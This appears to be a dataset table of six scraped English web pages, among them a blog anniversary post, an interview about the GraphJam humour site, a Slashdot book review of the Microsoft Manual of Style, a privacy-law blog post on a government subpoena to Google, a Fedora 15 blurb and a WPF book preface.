id
stringlengths 30
34
| text
stringlengths 0
75.5k
| industry_type
stringclasses 1
value |
---|---|---|
2015-48/3654/en_head.json.gz/7067 | HAPPY 7TH BLOGIVERSARY TO RIGHT WING NUT HOUSE
CATEGORY: Blogging
Has it really been 7 years? Nearly 3,700 posts, 4 million visitors, 5.5 million page views and a lot of emotional energy expended in that time. Numbers don’t tell the story. When I started this blog, September 23, 2004, we were in the midst of a hard fought presidential campaign that was in doubt until well into election night. The Dan Rather Affair had just hit the blogosphere and after reading everything I could about the matter, commenting on blog posts didn’t seem to be enough. With the encouragement of Ed Morrissey, I opened a Blogger account and began posting. Until about a year ago, I rarely missed a day.
What followed was not quite the “Rise and Fall” of a blogger - more like a journey of self discovery. Turning inward, I found my voice. It was not a voice that many on the right wanted to listen to — a fact that me in my towering ignorance never expected. Nor did I help my cause much by lashing out on occasion against my detractors. But it is, what it is, and that’s that. I found to my delight that there was still a market for rational, less ideological analysis, albeit a smaller and less profitable one. But with my two jobs at American Thinker and PJ Media, along with other independent articles sold to a couple of sites, I am making a better living than I ever thought possible as a writer/editor. And with a book in the works, who knows what the future will bring?
I have nothing really profound to say about the last 7 years. Blogs have changed dramatically — fewer links (sharing), many more bloggers, but still room for important voices to rise up and be heard. It is much harder to accomplish that today. And the Twitterverse and Facebook revolutions have altered the landscape even more.
A little over a year ago, I realized I was burned out and began writing less. That is going to change — as soon as I can divest myself of one of my jobs. The problem now isn’t so much that I’ve lost the desire to write but rather I have no time to do it. I am gearing up to restart this blog; a redesign, a new domain name (rickmoran.com), and much more frequent and extensive postings. In short, I am going to try and raise my profile on the right, hoping that there is a larger audience for my kind of comment and analysis than there was previously.
In previous years, I have used this occasion to thank those who have helped me along the way. I see no sense in repeating myself. You know who you are, and you know I will be eternally grateful. The number 7 has had a mystical history in the history of the civilized world. All sorts of good things have been associated with the digit — except perhaps the Seven Deadly Sins, of which I am on number 5 and striving hard to finish before I flee my mortal coil and join my fellow demigods on Olympus. But I am hoping that that this will indeed be a Lucky 7 year and that you - my most loyal and beloved readers — will join me in the adventure.
By: Rick Moran at 3:13 pm One Response to “HAPPY 7TH BLOGIVERSARY TO RIGHT WING NUT HOUSE”
Happy Seventh Blogiversary to Right Wing Nut House! | All American Blogger Pinged With:
3:28 pm [...] Seventh Blogiversary to Right Wing Nut House! Welcome to All American Blogger. If you’re new here, you may want to sign up for free updates via [...] | 计算机 |
2015-48/3654/en_head.json.gz/7982 | The Cartoon Lounge
A Chat with Ben Huh of GraphJam
By Drew Dernavich Share
Microsoft Office is to office workers what pencil and paper are to artists: the simple tools that allow a person to visualize information. But you’ve probably seen what happens when these tools fall into the wrong hands: the garish color choices! The gratuitous 3-D effects! Not to worry, cubicle dwellers. The perfect use for this software has finally arrived, and it’s not in building income projections or sales charts. No, it’s in helping us with the stuff we really think about—like, can the effects of Cecilia on Simon and Garfunkel be charted on a timeline? Are the utterances in the Beatles’ ”Hello Goodbye” better understood as a bar graph? This is the particular genius of GraphJam, a Web site that lets users create and upload their own information graphics from Excel templates. I recently spoke with Ben Huh, the Chief Cheezburger of the site (which is part of the I Can Has Cheezburger network and its strangely-captioned cats). CARTOON LOUNGE: The strange brand of humor that is lolcats has become very popular online——everybody loves cats and dogs. But pie charts and bar graphs? BEN HUH: We’ve seen funny graphs and charts before on the Interwebs and we’ve enjoyed them. In this case, it was a matter of giving them a place to shine. We don’t necessarily love or hate graphs, but they are a fun tool for stating a case. C.L.: They are, and they reflect the trend that ideas need to be expressed in terms of data if they are to have any credibility. Have you ever seen Peter Norvig’s version of what the Gettysburg Address would have been like if Lincoln had given it as a PowerPoint presentation? B.H.: That’s absolutely hilarious. I have not seen it, but it may have just spawned a new category of GraphJams. The inelegance of most PowerPoint presentations is just ridiculous—and must be ridiculed. C.L.: I think you’re the person to do it. Don’t you use PowerPoint and Excel in your sales meetings? B.H.: We only use them in explaining what makes us funny to the press… C.L.: These graphs take advantage of all the incredible graphic tools that Excel provides. But there are hard design decisions to be made also. Which color do you think works best in conveying how many times the word “ho” is used in a song: that nuclear cyan blue or the nauseating pink? B.H.: Those are the tough decisions we leave up to our users. Like true upper-management types, we shy away from those unimportant details. That’s what we don’t pay our submitters for. I mean, you probably don’t draw the cartoons yourself. They’re outsourced to Kizahtzmapastan, yes? C.L.: They used to be, but because Kizahtzmapastan is in a time zone twenty-eight hours ahead of us—the cartoons were ridiculously ahead of their time. Nobody understood them. But, yeah, I think I get the concept. Speaking of the users, how long did it take for this idea to catch on, and how soon did you realize that it would be so successful? B.H.: It took a few weeks, but it’s the kind of thing that grabs a hundred per cent of someone, but not a hundred per cent of everyone. The chart nerds (like me) get all geeked up but it’s certainly not for every nerd. Believe it or not, the idea of downloading an Excel file, making a graph, remaking it to be funny, and e-mailing it back to us isn’t the easiest way to get submissions. So we’re working on ways to make it even easier. C’mon, let’s face it, we’re all lazy. We think this will make submissions even better, by removing the burden of actually having to labor over Excel. C.L.: The burden of Excel? Somewhere Bill Gates is crying. B.H.: Um, yeah. In his Olympic-sized pool of money and power. C.L.: But between GraphJam, I Can Has Cheezburger, failblog, and your other sites, you’re nearing an electronic empire of your own. How do you spend your time? Are there any plans for a GraphJam movie? B.H.: Most of my day is spent preparing and planning…using Excel. Which makes me the perfect GraphJam audience. There’s no movie planned, but we are thinking about a book. C.L.: I’m making a prediction that sometime soon a mainstream band will tour, and instead of using the typical psychedelic light shows or video collages, they will have a screen with Excel graphs and pie charts behind them, “explaining” the songs in true GraphJam fashion. To your knowledge, has anyone done this yet? B.H.: Not that I know of, but that would be just awesome. The real question is, can you make music from office software? Like this? C.L.: Wow! Talk about lemonade from lemons. You don’t happen to have any office software that can create captions, do you? B.H.: Nope, but you can always use our Lol Builder. C.L.: If only it were that easy… Ben, I’d like to thank you, in true geek fashion, for chatting: B.H.: Epic. Sign up for the daily newsletter.Sign up for the daily newsletter: the best of The New Yorker every day. E-mail address GO SIGN UP Share
Drew Dernavich is a cartoonist. He has been contributing to The New Yorker since 2002 and has published over two hundred and fifty cartoons. | 计算机 |
2015-48/3654/en_head.json.gz/8817 | Microsoft Manual of Style
Microsoft Press;
Ben Rothke
Invaluable guide to becoming a better technical writer
A style guide or style manual is a set of standards for the writing and design of documents, either for general use or for a specific publication, organization or field. The implementation of a style guide provides uniformity in style and formatting of a document. There are hundreds of different style guides available — from the The Elements of Style by Strunk and White, to the Associated Press Stylebook and Briefing on Media Law and many more. Microsoft's goal in creating this style manual is about standardizing, clarifying and simplifying the creation of content by providing the latest usage guidelines that apply across the genres of technical communications. The manual has over 1,000 items, so that each author does not have to make the same 1,000 decisions. Anyone who has read Microsoft documentation knows it has a consistent look, feel and consistency; be it a manual for Visual C#, Forefront or Excel. With that, the Microsoft Manual of Style is an invaluable guide to anyone who wants to better the documentation they write. For example, many writers incorrectly use words such as less, fewer, and under as synonymous terms. The manual notes that one should use less to refer to a mass amount, value or degree; fewer to refer to a countable measure of items, and not to use under to refer to a quantity or number. Style guides by their very nature of highly subjective and no one is forced to take accept the Microsoft style as dogma. The authors themselves (note that the book was authored by a group of senior editors and content managers at Microsoft, not a single individual) note that they don't presume to say that the Microsoft way is the only way to write. Rather it is the guidance that they follow and are sharing it with the hope that the decisions they have made for their content professionals will help others promote consistency, clarity and accuracy. With that, they certainly have achieved that goal. The book is made up of two parts; with part 1 comprised of 11 chapters on general topics. Chapter 1 is about Microsoft style and voice and has basic suggestions around consistency, precision, sentence structure and more. The chapter also has interesting suggestions on writing bias-free text. It notes that writers should do their best to eliminate bias and to depict diverse individuals from all walks of life in their documentation. It's suggested to avoid terms that may show bias with regards to gender, race, culture, ability, age and more. Some examples are to avoid terms such as chairman, salesman and manpower; and use instead moderator, sales representative or workforce. The manual also notes that writers should attempt not to stereotype people with disabilities with negative connotations. It suggests that documentation should positively portray people with disabilities. It emphasizes that documentation should not equate people with their disability and to use terms that refer to physical disabilities as nouns, rather than adjectives. The book takes on a global focus and notes that since Microsoft sells its products and services worldwide, content must be suitable for a worldwide audience. For those writing for a global audience, those sections of the manual should be duly considered. The manual also cautions authors to avoid too many technical terms and jargon. The danger of inappropriate use of technical terms is that people who don't think of themselves as computer professionals consider technical terms to be a major stumbling block to understanding. The manual suggests whenever possible, to use common English words to get the point across, rather than technical one. The book provides thousands of suggestions on how to write better documentation, including: do not use hand signs in documentation — nearly every hand sign is offensive somewhere do not refer to seasons unless you have no other choice – since summer in the northern hemisphere is winter in the southern hemisphere spell out names of months – as 3/11/2012 can refer to March 11, 2012 in some places and November 3, 2012 in others use titles, not honorifics, to describe words such as Mr. or Ms. – not all cultures have an equivalent to some that are common in the United States, such as Ms. Chapter 6 is on procedures and technical content, and explains that consistent formatting of procedures and other technical content helps users find important information quickly and effectively. In the section on security, the style guide notes not to make statements that convey the impression or promise of absolute security. Instead, the writer should focus on technologies or features that help achieve security; and suggests to be careful when using words such as safe, private, secure, protect,and their synonyms or derivatives. It is best to use qualifiers such as helps or can help with these words. As noted earlier, the style guide is simply a guide, not an absolute. In the book Eats, Shoots & Leaves: The Zero Tolerance Approach to Punctuation, author Lynne Truss write of terms that are grammatically incorrect, but so embedded into the language, that they are what she terms a lost cause. With that, the style guide has the pervasive use of the term all right, as opposed to alright. According to dictionary.com, although alright is a common spelling in written dialogue and in other types of informal writing, all right is used in more formal, edited writing. My own preference is that alright is clearer and ultimately more concise. In this guide, I found that Microsoft's preference for all right to be distracting. Differences aside, part 1 provides vital assistance to any writer that is interested in writing effective content that educates the reader in the clearest manner possible. The book is the collective experience of thousands of writers and their myriad sets of documentation. The book provides page after pages of unique information. Part 2 is a usage dictionary that is a literal A-Z of technical terms, common words and phrases. The goal of the usage dictionary is to give the reader a predictable experience with the content and to ensure different writers usage a standard usage of the same term. Some interesting suggestions in the usage dictionary are: access rights – an obsolete term. Use user rights collaborator – do not use collaborator to describe a worker in a collaborative environment unless you have no other choice as it is a sensitive term in some countries. Specifically, being a collaborator in a third-world country can get one killed. email – do not use as a verb. Use send instead. master / slave – do not use as the terminology, although standard in the IT industry, may be insulting to some users. The manual notes that its use is prohibited in a US municipality. press – differentiate between the terms press, type, enter, and use, and to use press, not depress, hit or strike when pressing a key on the keyboard Some of the terms suggested are certainly Microsoft centric, such as: blue screen – they suggest not to use blue screen, either as a noun or a verb to refer to an operating system failure. Use stop or stop error instead IE – never abbreviate Internet Explorer; always use the full name Say what you will about Microsoft, but any technical writer who is serious about being a better writer can learn a lot from the writers at Microsoft. Microsoft is serious and passionate about documentation and it is manifest in this style guide. Microsoft has been criticized for their somewhat lukewarm embrace of open source. With the Microsoft Manual of Style, Microsoft is nearly freely sharing a huge amount of their intellectual capital. At $29 for the paperback and $10 for the Kindle edition, the manual has a windfall of valuable information at a bargain-basement of a price. This guide is a comprehensive manual for the serious writer of technical documentation, be it a high school student or veteran author. In fact, to describe the guide as comprehensive may be an understatement, as it details nearly every facet of technical writing, including arcane verb uses. Many authors simply write in an ad-hoc manner. This manual shows that effective writing is a discipline. The more disciplined the writer, the more consistent and better their output. Anyone that wants to be a better writer will undoubtedly find the Microsoft Manual of Style an exceptionally valuable resource. Ben Rothke is the author of Computer Security: 20 Things Every Employee Should Know.
You can purchase Microsoft Manual of Style from amazon.com. Slashdot welcomes readers' book reviews -- to see your own review here, read the book review guidelines, then visit the submission page.
Geologic Map of Jupiter's Moon Io Details an Otherworldly Volcanic Surface Book Review: The Terrorists of Iraq
Modern PHP: New Features and Good Practices
Book Review: Spam Nation
Book Review: FreeBSD Mastery: Storage Essentials
Book Review: Effective Python: 59 Specific Ways To Write Better Python
Submission: Book review: Microsoft Manual of Style
Wil Wheaton's New Show: Tabletop
Embracing open source?!
"Microsoft has been criticized for their somewhat lukewarm embrace of open source. With the Microsoft Manual of Style, Microsoft is nearly freely sharing a huge amount of their intellectual capital. At $29 for the paperback and $10 for the Kindle edition, the manual has a windfall of valuable information at a bargain-basement of a price. "Is this Microsoft astroturfing or is the author really that clueless about what free means?1. I can't modify and redistribute. So it's not free-as-in-rights2. It's $29, so it's not free as in beerIn what way is this guide supposed to be upholding OSS values?
Microsoft's Style ...
by sk999 (846068) writes: on Monday March 19, 2012 @05:06PM (#39407797)
I always find Microsoft's documentation to be characterized consistently by two properties:1. Tons of GUI screen shots. 20 pages of dead trees or dead electrons to convey a single paragraph's worth of actual information.2. There is no universe outside of Microsoft. They can't acknowledge it even when they try. Example - Microsoft Exchange is notorious for violating the IMAP standard for RFC-822 message size. Microsoft's documentation actually acknowledges that Exchange does something different, but calls it a "clarification" of the standard. Right.
Re:what's in a name?
by MtHuurne (602934) writes: on Monday March 19, 2012 @06:15PM (#39408489)
Homepage There is a lot of bad documentation out there, so Microsoft's is probably above average, but I wouldn't call it good. At least the .Net documentation is a huge collection of example code fragments but contains very little text that actually explains what the methods do. Especially important details like how the method reacts when the input is invalid, the state is invalid, the operation fails etc are often missing. Or some hint about the underlying implementation, so you can get a feeling which methods have to do a lot of work and which will return quickly. You can't learn those things from a code example, they have to be documented explicitly.
270 commentsBook Review: The Terrorists of Iraq
182 commentsModern PHP: New Features and Good Practices
82 commentsBook Review: Spam Nation
75 commentsBook Review: FreeBSD Mastery: Storage Essentials
71 commentsBook Review: Effective Python: 59 Specific Ways To Write Better Python
Geologic Map of Jupiter's Moon Io Details an Otherworldly Volcanic Surface | 计算机 |
2015-48/3654/en_head.json.gz/8859 | Google & Search Engines / Privacy / Privacy (Consumer Privacy)
32 Do No Evil and Perhaps Do Some Good: Google, Privacy, and Business Records
by Daniel Solove · January 20, 2006
I just blogged about the case where the goverment is seeking search query records from Google. I am very pleased that Google is opposing the goverment’s suboena. According to the AP artice:
Google — whose motto when it went public in 2004 was “do no evil” — contends that submitting to the subpoena would represent a betrayal to its users, even if all personal information is stripped from the search terms sought by the government.
“Google’s acceding to the request would suggest that it is willing to reveal information about those who use its services. This is not a perception that Google can accept,” company attorney Ashok Ramani wrote in a letter included in the government’s filing.
In contrast to Google, other search engine companies such as Yahoo complied with the subpoenas without putting up a fight. Google is to be applauded for taking the effort to rebuff the government’s request.
The government is increasingly interested in gathering personal information maintained by various businesses. As I wrote in my book, The Digital Person:
While life in the Information Age has brough us a dizzying amount of information, it has also placed a profound amount of information in the hands of numerous entities. . . . [T]hese digital dossiers are increasingly becoming digital biographies, a horde of aggregated bits of information combined to reveal a portrait of who we are based upon what we buy, the organizations we belong to, how we navigate the Internet, and which shows and videos we watch. This information is not held by trusted friends or family members, but by large bureaucracies that we do not know very well or sometimes do not even know at all.
I also wrote about the issue in an article available at SSRN.
One enormous problem is that the Supreme Court has established an immensely troubling doctrine in Fourth Amendment law known as the “third party doctrine.” In United States v. Miller, 425 U.S. 435 (1976), the Supreme Court held that people lack a reasonable expectation in their bank records because “[a]ll of the documents obtained, including financial statements and deposit slips, contain only information voluntarily conveyed to the banks and exposed to their employees in the ordinary course of business.” Employing analogous reasoning, in Smith v. Maryland, 442 U.S. 735 (1979), the Supreme Court held that people lack a reasonable expectation of privacy in pen register information (the phone numbers they dial) because people “know that they must convey numerical information to the phone company,” and therefore they cannot “harbor any general expectation that the numbers they dial will remain secret.” When there’s no reasonable expectation of privacy, the Fourth Amendment provides no protection.
The problem with the third party doctrine is that in the Information Age, countless companies maintain detailed records of people’s personal information: Internet Service Providers, merchants, bookstores, phone companies, cable companies, and many more. The third party doctrine thus severely limits Fourth Amendment protection as more of our personal information winds up in the hands of businesses.
In my book and article discussed above, I also explain that in the void left by the Fourth Amendment, Congress has passed a series of statutes that provide some regulation on government access to records of personal information maintained by businesses. The problem is that these statutes are woefully inadequate. As I wrote:
[T]here are gaping holes in the statutory regime of protection, with classes of records not protected at all. Such records include those of merchants, both online and offline. Records held by bookstores, department stores, restaurants, clubs, gyms, employers, and other companies are not protected. Additionally, all the personal information amassed in profiles by database companies is not covered.
Further, the statutes often do not provide for significant-enough standards for the government to access data. In other words, it is still very easy for the government to obtain the data even with the statutes.
I believe that this state of affairs presents problems not just for individual privacy, but for the businesses maintaining personal information as well. The government may gather personal information from businesses notwithstanding their privacy policies. This thwarts the interests of companies that want to encourage people to reveal information by promising strong limitations in its use. It adds an often unstated risk to a consumer’s revealing information to a company. It erodes people’s trust in companies as well.
A while back, I blogged about why businesses should lobby Congress for greater protections against government access to business records involving personal information:
I also think that businesses should use their power to push for greater legislative protections of personal information from government access. It is here were Google’s interests and the privacy interests of its users coincide. Right now, the government is inadequately regulated when it comes to accessing personal data maintained by third parties. If the businesses maintaining the data lobbied Congress for greater protections, this would help to address one of the major privacy threats that their maintaining the information poses. It wouldn’t solve all of the problems, but it would address a big one.
I urge Google and other businesses that gather personal information to push for legislation to better regulate government information gathering from businesses. I applaud the fact that Google is fighting the government’s subpoenas, but I urge them (and others) to go further. It is here where business interests and individual consumer interests are aligned with regard to privacy.
1. Solove, Government vs. Google
2. Solove, Google’s Empire, Privacy, and Government Access to Personal Data
The right to life, liberty, and a favorable ranking
On Nondisclosure Agreements and Societal Harm
George Bush’s Virgin Brides
Michael Bains says: January 20, 2006 at 11:42 am I’ve never been an absolutist. In this kind of situation, I would say that the only way Google could be compelled to deliver any such information, would be if the government had shown, to a relevant justice’s satisfaction, that a case might likely hinge upon the delivery of certain, very specific, information from Google’s databases.
It would have to be very specific though.
Adam says: January 20, 2006 at 11:54 am Great post! I’m curious: why not work to overturn Miller, now that we see how pernicious it turns out to be?
Peter T Davis's Small Business Blog says: January 20, 2006 at 12:58 pm Bush Wants to Violate my Fourth Ammendment Rights? And Yours too!
“The right of the people to be secure in their persons, houses, papers, and effects, against unreasonable searches and seizures, shall not be violated, and no warrants shall issue, but upon probable cause, supported by oath or affirmation, and particul…
BTD_Venkat says: January 20, 2006 at 1:02 pm Doesn’t a privacy policy alter the expectation of privacy analysis?
I’m no fan of governmental efforts to seek information from third parties, but my understanding in this case was that the government is not seeking any personal information (IP addresses, etc.). Arguably a certain amount of personal information may show up as search terms but not much (are you really going to google your own SS#).
For this reason I think google chiefly opposed the request on trade secret / unduly burdensome grounds.
BTD_Venkat says: January 20, 2006 at 1:06 pm Ah, I see you addressed some of this in your previous post As to the chilling effects, you are right on. The bookstore cases (Tattered Cover, Kramerbooks, see generally this article) provide a good analogy.
Mike says: January 20, 2006 at 1:36 pm Google will defy the US Government, but cooperate WILLINGLY to help the Chinese Government prevent searches “freedom” and “democracy”. Can anyone explain this?
“Google and Yahoo both censor some results on Chinese versions of their products, and the MSN blog tool in China prevents phrases like “Dalai Lama” and “human rights” from being used in the title for an entry.”
http://www.iht.com/bin/print_ipub.php?file=/articles/2006/01/15/business/chinet.php
Dave! says: January 20, 2006 at 2:25 pm Just curious, what about a reasonable expectation of privacy when a company (such as Google) makes a promise not to release your personal information to anyone? To the lay person, I think that definitely establishes an expectation of privacy, but is there any caselaw to that effect?
Daniel J. Solove says: January 20, 2006 at 2:58 pm Dave — One would think, rationally, that a promise not to release your personal information to third parties would give rise to an expectation of privacy. But don’t expect such rationality from the Supreme Court. Banks for years have been operating under implicit and explicit promises to keep customer information privacy. Yet, in United States v. Miller, the Court completely ignored the longstanding tradition of banks providing privacy to their customers. | 计算机 |
2015-48/3654/en_head.json.gz/9074 | Fedora Core 15 x86_64 DVD
Platform: x86_64
The Fedora Project is an openly-developed project designed by Red Hat, open for general participation, led by a meritocracy, following a set of project objectives. The goal of The Fedora Project is to work with the Linux community to build a complete, general purpose operating system exclusively from open source software. Development will be done in a public forum. The project will produce time-based releases of Fedora about 2-3 times a year, with a public release schedule. The Red Hat engineering team will continue to participate in building Fedora and will invite and encourage more outside participation than in past releases. Fedora 15, a new version of one of the leading and most widely used Linux distributions on the market, has been released. Some of the many new features include support for Btrfs file system, Indic typing booster, redesigned SELinux troubleshooter, better power management, LibreOffice productivity suite, and, of course, the brand-new GNOME 3 desktop: "GNOME 3 is the next generation of GNOME with a brand new user interface. It provides a completely new and modern desktop that has been designed for today's users and technologies. Fedora 15 is the first major distribution to include GNOME 3 by default. GNOME 3 is being developed with extensive upstream participation from Red Hat developers and Fedora volunteers, and GNOME 3 is tightly integrated in Fedora 15." manufacturer website
1 dvd for installation on an 86_64 platform back to top | 计算机 |
2015-48/3654/en_head.json.gz/9495 | Essential Windows Presentation Foundation (WPF)
“Chris Anderson was one of the chief architects of the next-generation GUI stack, the Windows Presentation Framework (WPF), which is the subject of this book. Chris’s insights shine a light from the internals of WPF to those standing at the entrance, guiding you through the concepts that form the foundation of his creation.” –…
Essential Windows Presentation Foundation (WPF) available in
“Chris Anderson was one of the chief architects of the next-generation GUI stack, the Windows Presentation Framework (WPF), which is the subject of this book. Chris’s insights shine a light from the internals of WPF to those standing at the entrance, guiding you through the concepts that form the foundation of his creation.” –From the foreword by Chris Sells “As one of the architects behind WPF, Chris Anderson skillfully explains not only the ‘how,’ but also the ‘why.’ This book is an excellent resource for anyone wanting to understand the design principles and best practices of WPF.” –Anders Hejlsberg, technical fellow, Microsoft Corporation “If WPF stands as the user interface technology for the next generation of Windows, then Chris Anderson stands as the Charles Petzold for the next generation of Windows user interface developers.” –Ted Neward, founding editor, TheServerSide.NET “This is an excellent book that does a really great job of introducing you to WPF, and explaining how to unlock the tremendous potential it provides.” –Scott Guthrie, general manager, Developer Division, Microsoft “WPF is a whole new animal when it comes to creating UI applications, drawing on design principles originating from both Windows Forms and the Web. Chris does a great job of not only explaining how to use the new features and capabilities of WPF (with associated code and XAML based syntax), but also explains why things work the way they do. As one of the architects of WPF, Chris gives great insight into the plumbing and design principles of WPF, as well as the mechanics of writing code using it. This is truly essential if you plan to be a serious WPF developer.” –Brian Noyes, chief architect, IDesign Inc.; Microsoft Regional Director; Microsoft MVP “I was given the opportunity to take a look at Chris Anderson’s book and found it to be an exceedingly valuable resource, one I can comfortably recommend to others. I can only speak for myself, but when faced with a new technology I like to have an understanding of how it relates to and works in relation to the technology it is supplanting. Chris starts his book by tying the WPF directly into the world of Windows 32-bit UI in C++. Chris demonstrates both a keen understanding of the underlying logic that drives the WPF and how it works and also a skill in helping the reader build on their own knowledge through examples that mimic how you would build your cutting edge applications.” –Bill Sheldon, principal engineer, InterKnowlogy Windows Presentation Foundation (WPF) replaces Microsoft’s diverse presentation technologies with a unified, state-of-the-art platform for building rich applications. WPF combines the best of Windows and the Web; fully integrates user interfaces, documents, and media; and leverages the full power of XML-based declarative programming. In Essential Windows Presentation Foundation, former WPF architect Chris Anderson systematically introduces this breakthrough platform, focusing on the concepts and techniques working developers need in order to build robust applications for real users. Drawing on his unique experience as an architect on the team, Anderson thoroughly illuminates the crucial new concepts underlying WPF and reveals how its APIs work together to offer developers unprecedented value.Through working sample code, you’ll discover how WPF draws on the Web’s simple models for markup and deployment, common frame for applications, and rich server connectivity, and on Windows’ rich client model, simple programming model, strong control over look-and-feel, and rich networking. Topics explored in depth include WPF components and architecture Key WPF design decisions–and why they matter XAML markup language Controls Layouts Visuals and media, including 2D, 3D, video, and animation Data integration Actions Styles WPF Base Services Essential Windows Presentation Foundation is the definitive, authoritative, code-centric WPF reference: everything Windows developers need to create a whole new generation of rich, graphical applications.Figures Foreword by Don Box Foreword by Chris Sells Preface About the Author Chapter 1: Introduction Chapter 2: Applications Chapter 3: Controls Chapter 4: Layout Chapter 5: Visuals Chapter 6: Data Chapter 7: Actions Chapter 8: Styles Appendix: Base Services Index Read More
Microsoft .NET Development Series
General & Miscellaneous Software
Read an ExcerptOver the past nine years I have worked on many user interface (UI) projects at Microsoft. I have spent time working on Visual Basic 6.0, the version of Windows Foundation Classes that shipped with Visual J++ 6.0, Windows Forms for the .NET Framework, internal projects that never saw the light of day, and now, finally, Windows Presentation Foundation (WPF).I started working on WPF about 18 months after the team was created, joining as an architect in the fall of 2002. At that time, and until late 2005, the team and technology were code-named Avalon. Early in 2003 I had the privilege of helping to redesign the platform, which we released as a technology preview for the Professional Developers Conference (PDC) 2003 in Los Angeles. WPF is the product of almost five years of work by more than 300 people. Some of the design ideas in WPF date back to products from as early as 1997 (Application Foundation Classes for Java was the beginning of some of the ideas for creating components in WPF).When I joined the WPF team, it was still very much in research mode. The project contained many more ideas than could possibly ship in a single version. The primary goal of WPF—to replace all the existing infrastructure for building applications on the client with a new integrated platform that would combine the best of Win32 and the Web—was amazingly ambitious and blurred the lines between user interface, documents, and media. Over the years we have made painful cuts, added great features, and listened to a ton of feedback from customers, but we never lost sight of that vision.A Brief History of GUIGraphical user interfaces (GUIs) started in the early 1980s in the Xerox PARC laboratory. Since then, Microsoft, Apple, and many other companies have created many platforms for producing GUI applications. Microsoft’s GUI platform began with Windows 1.0 but didn’t gain widespread use until Windows 3.0 was released in 1990. The primary programming model for building GUI applications consisted of the two dynamic link libraries (DLLs): User and GDI. In 1991 Microsoft released Visual Basic 1.0, which was built on top of User and GDI, and offered a much simpler programming model.Visual Basic’s UI model, internally called Ruby,1 was far simpler to use than were the raw Windows APIs. This simplicity angered the developers who felt that programming should be difficult. The early versions of Visual Basic were significantly limited, however, so most developers building “real” applications chose to program directly to User and GDI. Over time, that changed. By the time the Microsoft world moved to 32-bit with the release of Windows 95 and Visual Basic 4.0, the VB crowd was gaining significant momentum and was offering a much wider breadth of platform features.At about the same time there was another big shift in the market: the Internet. Microsoft had been working on a replacement for the Visual Basic UI model that was internally called Forms3. For various reasons, Microsoft decided to use this model as the basis for an offering in the browser space. The engine was renamed Trident internally, and today it ships in Windows asMSHTML.dll. Trident evolved over the years to be an HTML-specific engine with great text layout, markup, and scripting support.Also around the same time, another phenomenon appeared on everyone’s radar: managed code. Visual Basic had been running in a managed environment for a long time (as had many other languages), but the introduction of Java by Sun Microsystems in 1994 marked the first time that many developers were exposed to the notion of a virtual machine. Over the next several years managed code became a larger and larger force in the market, and in 2002 Microsoft released its own general-purpose managed-code platform: the .NET Framework. Included in the .NET Framework was Windows Forms, a managed-code API for programming User32 and GDI+ (a successor to GDI32). Windows Forms was intended to replace the old Ruby forms package in Visual Basic.As we entered the new millennium, Microsoft had four predominant UI platforms: User32/GDI32, Ruby, Trident, and Windows Forms. These technologies solve different sets of problems, have different programming models, and are used by different sets of customers. Graphics systems had also evolved: In 1995, Microsoft introduced DirectX, a graphics system that gave the programmer much deeper access to the hardware. But none of the four main UI technologies used this newfound power in a meaningful way.There was a real problem to be solved here. Customers were demanding the richness of modern video games and television productions in their applications. Media, animation, and rich graphics should be everywhere. They wanted rich text support because almost every application displayed some type of text or documentation. They wanted rich widgets for creating applications, buttons, trees, lists, and text editors—all of which were needed to build the most basic application.With these four major platforms a large percentage of the customers’ needs were met, but they were all islands. The ability to mix and match parts of the platforms was difficult and error-prone. From a purely selfish point of view, Microsoft management (well, I’ll name names: Bill Gates) was tired of paying four teams to build largely overlapping technologies.In 2001, Microsoft formed a new team with a simple-sounding mission: to build a unified presentation platform that could eventually replace User32/GDI32, Ruby, Trident, and Windows Forms, while enabling the new scenarios that customers were demanding in the presentation space. The people who made up this team came largely from the existing presentation platform teams, and the goal was to produce a best-of-breed platform that could really be a quantum leap forward.And so the Avalon team was formed. At PDC 2003, Microsoft announced Avalon (the code name at the time). Later the project was given the name Windows Presentation Foundation.Principles of WPFWPF has taken a long time to build, but for the entire life of this project, several guiding principles have remained constant.Build a Platform for Rich PresentationIn descriptions of new technology, rich is probably one of the most overused words. However, I can’t think of a better term to convey the principle behind WPF. Our goal was to create a superset of features from all existing presentation technologies—from basic things like vector graphics, gradients, and bitmap effects, to more advanced things like 3D, animation, media, and typography. The other key part of the principle was the word platform. The goal was to create not merely a runtime player for rich content, but rather an application platform that people could use to build large-scale applications and even extend the platform to do new things that we never envisioned.Build a Programmable PlatformEarly on, the WPF team decided that both a markup (declarative) and code (imperative) programming model were needed for the platform. As we looked around at the time, it became clear that developers were embracing the new managed-code environments. Quickly, the principle of a programmable platform became a principle of a managed programming model. The goal was to make managed code the native programming model of the system, not a tacked-on layer.Build a Declarative PlatformFrom the perspective of both customers and software developers, it seemed clear that the industry was moving to a more and more declarative programming model. We knew that for WPF to be successful, we needed a rich, consistent, and complete markup-based programming model. Again, a look at what was going on in the industry made it clear thatIntegrate UI, Documents, and MediaProbably the biggest problem facing customers who were building applications was the separation of pieces of functionality into isolated islands. There was one platform for building user interfaces, another for building a document, and a host of platforms for building media, depending on what the medium was (3D, 2D, video, animation, etc.). Before embarking on building a new presentation system, we set a hard-and-fast goal: The integration of UI, documents, and media would be the top priority for the entire team.Incorporate the Best of the Web, and the Best of WindowsThe goal here was to take the best features from the last 20 years of Windows development and the best features from the last 10 years of Web development and create a new platform. The Web offers a great simple markup model, deployment model, common frame for applications, and rich server connectivity. Windows offers a rich client model, simple programming model, control over the look and feel of an application, and rich networking services. The challenge was to blur the line between Web applications and Windows applications.Integrate Developers and DesignersAs applications become graphically richer and cater more to user experience, an entirely new community must be integrated into the development process. Media companies (print, online, television, etc.) have long known that a variety of designer roles need to be filled to create a great experience for customers, and now we are seeing that same requirement for software applications. Historically the tools that designers used were completely disconnected from the software construction process: Designers used tools like Adobe Photoshop or Adobe Illustrator to create rich designs, only to have developers balk when they tried to implement them. Creating a unified system that could natively support the features that designers required, and using a markup format (XAML) that would allow for seamless interoperability between tools, were two of the outcomes of this principle.About This BookMany books on WPF are, and will be, available. When I first thought of writing a book, I wanted to make sure that mine would offer something unique. This book is designed for application developers; it is intended as a conceptual reference book covering most of WPF.I chose each word in the preceding statement carefully.This book is about applications. There are really two types of software: software designed to communicate with people, and software designed to communicate with software. I use the term application to mean software written primarily for communication with people. Fundamentally, WPF is all about communication with people.This is a book for developers. I wanted to present a very code-centric view of the platform. I’m a developer first and foremost, and in working as an architect on the WPF team I have always considered the external developer as my number one customer. This book focuses on topics primarily for the application developer. Although a control developer will also find a lot of useful information in this book, its purpose is not to present a guide for building custom controls.This book is about concepts, not just APIs. If you want an API reference, use Google or MSN search features and browse the MSDN documentation. I 